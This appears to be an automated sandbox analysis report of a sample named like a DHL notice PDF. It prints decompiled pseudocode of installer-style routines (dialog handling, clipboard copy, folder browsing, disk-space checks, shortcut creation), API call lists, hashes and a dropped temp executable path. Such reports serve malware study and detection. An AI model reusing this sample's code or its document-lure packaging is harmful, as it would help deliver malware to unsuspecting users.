							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                            0x00405811
                                                            0x00405817
                                                            0x00405821
                                                            0x00405824
                                                            0x004059ba
                                                            0x004059de
                                                            0x004059de
                                                            0x004059f1
                                                            0x00405a0f
                                                            0x00405a11
                                                            0x00405a19
                                                            0x00405a6f
                                                            0x00405a73
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a75
                                                            0x00405a7b
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a85
                                                            0x00405a8d
                                                            0x00405a90
                                                            0x00405b92
                                                            0x00000000
                                                            0x00405b92
                                                            0x00405a9f
                                                            0x00405aaa
                                                            0x00405ab3
                                                            0x00405abe
                                                            0x00405ac1
                                                            0x00405aca
                                                            0x00405ad0
                                                            0x00405ad3
                                                            0x00405ad3
                                                            0x00405aeb
                                                            0x00405af4
                                                            0x00405af7
                                                            0x00405afe
                                                            0x00405b05
                                                            0x00405b0d
                                                            0x00405b0d
                                                            0x00405b24
                                                            0x00405b24
                                                            0x00405b2b
                                                            0x00405b31
                                                            0x00405b3d
                                                            0x00405b44
                                                            0x00405b4d
                                                            0x00405b4f
                                                            0x00405b52
                                                            0x00405b61
                                                            0x00405b64
                                                            0x00405b6a
                                                            0x00405b6b
                                                            0x00405b71
                                                            0x00405b72
                                                            0x00405b73
                                                            0x00405b7b
                                                            0x00405b86
                                                            0x00405b8c
                                                            0x00405b8c
                                                            0x00000000
                                                            0x00405aeb
                                                            0x00405a21
                                                            0x00405a51
                                                            0x00405a59
                                                            0x00405a64
                                                            0x00405a64
                                                            0x00405a6a
                                                            0x00000000
                                                            0x00405a6a
                                                            0x00405a25
                                                            0x00405a2f
                                                            0x00000000
                                                            0x004059f3
                                                            0x004059f9
                                                            0x00405a34
                                                            0x00000000
                                                            0x00405a3d
                                                            0x00405a02
                                                            0x00405a07
                                                            0x00405a0a
                                                            0x00000000
                                                            0x00405a0a
                                                            0x004059f1
                                                            0x0040582a
                                                            0x0040582e
                                                            0x00405836
                                                            0x0040583a
                                                            0x0040583d
                                                            0x00405840
                                                            0x00405843
                                                            0x00405846
                                                            0x00405847
                                                            0x00405848
                                                            0x00405861
                                                            0x00405864
                                                            0x0040586e
                                                            0x0040587d
                                                            0x00405885
                                                            0x0040588d
                                                            0x00405892
                                                            0x00405895
                                                            0x004058a1
                                                            0x004058aa
                                                            0x004058b3
                                                            0x004058d5
                                                            0x004058db
                                                            0x004058ec
                                                            0x004058f1
                                                            0x004058ff
                                                            0x0040590d
                                                            0x0040590d
                                                            0x00405912
                                                            0x00405920
                                                            0x00405920
                                                            0x00405925
                                                            0x00405928
                                                            0x0040592d
                                                            0x00405939
                                                            0x00405942
                                                            0x0040594f
                                                            0x0040595e
                                                            0x00405951
                                                            0x00405956
                                                            0x00405956
                                                            0x0040596a
                                                            0x0040596a
                                                            0x0040597e
                                                            0x00405987
                                                            0x00405990
                                                            0x004059a0
                                                            0x004059ac
                                                            0x004059ac
                                                            0x00000000

                                                            APIs
                                                            • GetDlgItem.USER32 ref: 00405867
                                                            • GetDlgItem.USER32 ref: 00405876
                                                            • GetClientRect.USER32 ref: 004058B3
                                                            • GetSystemMetrics.USER32 ref: 004058BA
                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                            • ShowWindow.USER32(?,00000008), ref: 00405956
                                                            • GetDlgItem.USER32 ref: 00405977
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                            • GetDlgItem.USER32 ref: 00405885
                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                            • GetDlgItem.USER32 ref: 004059C9
                                                            • CreateThread.KERNEL32 ref: 004059D7
                                                            • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                            • ShowWindow.USER32(00000000), ref: 00405A02
                                                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                            • ShowWindow.USER32(00000008), ref: 00405A51
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                            • CreatePopupMenu.USER32 ref: 00405A96
                                                            • AppendMenuW.USER32 ref: 00405AAA
                                                            • GetWindowRect.USER32 ref: 00405ACA
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                            • EmptyClipboard.USER32 ref: 00405B31
                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                            • GlobalLock.KERNEL32 ref: 00405B47
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                            • SetClipboardData.USER32 ref: 00405B86
                                                            • CloseClipboard.USER32 ref: 00405B8C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: H7B${
                                                            • API String ID: 590372296-2256286769
                                                            • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                            • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                            0x00404ab5
                                                            0x00404abb
                                                            0x00404ac1
                                                            0x00404ace
                                                            0x00404adc
                                                            0x00404adf
                                                            0x00404ae7
                                                            0x00404aed
                                                            0x00404aed
                                                            0x00404af9
                                                            0x00404afc
                                                            0x00404b6a
                                                            0x00404b71
                                                            0x00404c48
                                                            0x00404c4f
                                                            0x00404c5e
                                                            0x00404c5e
                                                            0x00404c62
                                                            0x00404c6c
                                                            0x00404c79
                                                            0x00404c7b
                                                            0x00404c7b
                                                            0x00404c89
                                                            0x00404c90
                                                            0x00404c97
                                                            0x00404c9a
                                                            0x00404cd6
                                                            0x00404cd8
                                                            0x00404cde
                                                            0x00404ce3
                                                            0x00404ce7
                                                            0x00404ce9
                                                            0x00404ce9
                                                            0x00404d05
                                                            0x00000000
                                                            0x00404d07
                                                            0x00404d0a
                                                            0x00404d18
                                                            0x00404d1e
                                                            0x00404d1f
                                                            0x00404d22
                                                            0x00404d25
                                                            0x00000000
                                                            0x00404d25
                                                            0x00404c9c
                                                            0x00404c9e
                                                            0x00404ca2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404ca4
                                                            0x00404ca4
                                                            0x00404cb1
                                                            0x00404cb6
                                                            0x00000000
                                                            0x00000000
                                                            0x00404cba
                                                            0x00404cbc
                                                            0x00404cbc
                                                            0x00404cc5
                                                            0x00404cc7
                                                            0x00404ccc
                                                            0x00404ccf
                                                            0x00404cd4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404cd4
                                                            0x00404d31
                                                            0x00404d3b
                                                            0x00404d3e
                                                            0x00404d41
                                                            0x00404d48
                                                            0x00404d48
                                                            0x00404d4a
                                                            0x00404d4a
                                                            0x00404d4f
                                                            0x00404d51
                                                            0x00404d59
                                                            0x00404d60
                                                            0x00404d62
                                                            0x00404d6d
                                                            0x00404d6d
                                                            0x00404d62
                                                            0x00404d7d
                                                            0x00404d87
                                                            0x00404d8f
                                                            0x00404daa
                                                            0x00404d91
                                                            0x00404d9a
                                                            0x00404d9a
                                                            0x00404d8f
                                                            0x00404daf
                                                            0x00404db4
                                                            0x00404db9
                                                            0x00404dc2
                                                            0x00404dc2
                                                            0x00404dcb
                                                            0x00404dcd
                                                            0x00404dcd
                                                            0x00404dd9
                                                            0x00404de1
                                                            0x00404deb
                                                            0x00404deb
                                                            0x00404df0
                                                            0x00000000
                                                            0x00404df0
                                                            0x00404c9a
                                                            0x00404c51
                                                            0x00404c58
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404c58
                                                            0x00404b77
                                                            0x00404b80
                                                            0x00404b9a
                                                            0x00404b9f
                                                            0x00404ba9
                                                            0x00404bb0
                                                            0x00404bbc
                                                            0x00404bbf
                                                            0x00404bc2
                                                            0x00404bc9
                                                            0x00404bd1
                                                            0x00404bd4
                                                            0x00404bd8
                                                            0x00404bdf
                                                            0x00404be7
                                                            0x00404c41
                                                            0x00404be9
                                                            0x00404bea
                                                            0x00404bf1
                                                            0x00404bfb
                                                            0x00404c03
                                                            0x00404c10
                                                            0x00404c24
                                                            0x00404c28
                                                            0x00404c28
                                                            0x00404c24
                                                            0x00404c2d
                                                            0x00404c3a
                                                            0x00404c3a
                                                            0x00404be7
                                                            0x00000000
                                                            0x00404b9f
                                                            0x00404b8d
                                                            0x00000000
                                                            0x00000000
                                                            0x00404b93
                                                            0x00000000
                                                            0x00404afe
                                                            0x00404b0b
                                                            0x00404b14
                                                            0x00404b21
                                                            0x00404b21
                                                            0x00404b28
                                                            0x00404b2e
                                                            0x00404b37
                                                            0x00404b3a
                                                            0x00404b3d
                                                            0x00404b45
                                                            0x00404b48
                                                            0x00404b4b
                                                            0x00404b51
                                                            0x00404b58
                                                            0x00404b5f
                                                            0x00404df6
                                                            0x00404e08
                                                            0x00404b65
                                                            0x00404b68
                                                            0x00000000
                                                            0x00404b68
                                                            0x00404b5f

                                                            APIs
                                                            • GetDlgItem.USER32 ref: 00404B04
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                            • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00423748,00000000,?,?), ref: 00404C1C
                                                            • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t), ref: 00404C28
                                                            • SetDlgItemTextW.USER32 ref: 00404C3A
                                                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$A$C:\Users\user\AppData\Local\Temp$H7B
                                                            • API String ID: 2624150263-1087676780
                                                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                            0x004021b3
                                                            0x004021bd
                                                            0x004021c7
                                                            0x004021d1
                                                            0x004021dc
                                                            0x004021df
                                                            0x004021f9
                                                            0x004021fc
                                                            0x00402202
                                                            0x00402205
                                                            0x0040220f
                                                            0x00402213
                                                            0x00402213
                                                            0x00402218
                                                            0x00402229
                                                            0x00402231
                                                            0x004022e8
                                                            0x004022e8
                                                            0x004022ef
                                                            0x00402237
                                                            0x00402237
                                                            0x00402246
                                                            0x0040224a
                                                            0x0040224d
                                                            0x00402253
                                                            0x00402261
                                                            0x00402264
                                                            0x00402266
                                                            0x00402271
                                                            0x00402271
                                                            0x00402276
                                                            0x00402278
                                                            0x0040227f
                                                            0x0040227f
                                                            0x00402282
                                                            0x0040228b
                                                            0x0040228e
                                                            0x00402294
